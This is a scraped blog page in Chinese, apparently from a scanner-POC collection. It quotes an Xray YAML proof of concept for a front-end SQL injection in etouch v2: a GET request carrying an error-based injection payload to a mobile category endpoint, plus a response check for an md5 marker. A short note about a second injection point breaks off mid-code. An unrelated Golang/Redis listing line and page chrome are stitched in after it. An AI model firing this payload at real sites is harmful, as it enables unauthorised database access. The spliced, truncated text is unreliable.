原始yml:name: poc-yaml-etouch-v2-sqli
name: poc-yaml-etouch-v2-sqli
rules:
- method: GET
path: >-
/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'
expression: |
response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b")
detail:
author: MaxSecurity(https://github.com/MaxSecurity)
links:
- https://github.com/mstxq17/CodeCheck/
这个要做前台无限制sql注入:
前台FLOW cart_label_count $goods_id 半限制SQL注入
public function cart
这篇博客介绍了如何利用Xray进行POC测试,特别是针对etouch v2的前台SQL注入漏洞。文章详细展示了三个不同的注入点(sqli1, sqli2, sqli3)的GET请求路径和预期响应,说明了如何通过布尔盲注进行利用。"
96145648,5593534,Golang使用Redigo实现Redis发布订阅,"['Golang', 'Redis', 'NoSQL数据库', '缓存']
订阅专栏 解锁全文
扫一扫
56万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
